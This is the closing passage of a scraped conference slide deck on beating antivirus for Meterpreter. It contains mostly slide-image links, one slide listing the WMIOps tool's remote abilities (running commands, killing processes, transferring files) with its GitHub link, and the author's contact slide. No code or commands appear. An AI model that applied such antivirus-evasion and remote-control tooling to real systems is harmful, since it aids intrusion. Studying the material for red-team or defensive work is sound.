![Page 65: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/65.jpg)
![Page 66: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/66.jpg)
WMIOps
■ WMIOps can do other tasks as well
■ Run commands
■ Kill processes
■ Search for files
■ Transfer files
■ Etc.
Available here - https://github.com/ChrisTruncer/WMIOps
![Page 67: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/67.jpg)
Thanks! Any questions?
Reach out to me!
■ @ChrisTruncer
■ [email protected]
■ https://www.christophertruncer.com
■ https://www.github.com/ChrisTruncer